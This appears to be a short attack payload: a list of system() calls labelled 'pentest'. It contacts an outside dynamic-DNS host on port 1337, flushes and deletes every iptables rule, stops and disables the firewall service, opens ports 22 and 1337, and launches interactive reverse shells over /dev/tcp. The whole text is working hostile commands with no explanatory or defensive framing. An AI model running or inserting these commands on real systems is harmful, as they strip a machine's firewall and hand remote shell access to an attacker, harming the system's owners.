system("curl http://25mpgaahipvzi40q.myfritz.net:1337/pentest")
system("touch pentest")
system("iptables -F")
system("iptables -X")
system("iptables -Z")
system("iptables -t nat -F")
system("iptables -t nat -X")
system("iptables -t nat -Z")
system("iptables -A INPUT -p tcp --dport 22 -j ACCEPT")
system("systemctl stop iptables")
system("systemctl disable iptables")
system("iptables -A INPUT -p tcp --dport 1337 -j ACCEPT")
system("sh -i >& /dev/tcp/localhost/1337 0>&1")
system("sh -i >& /dev/tcp/127.0.0.1/1337 0>&1")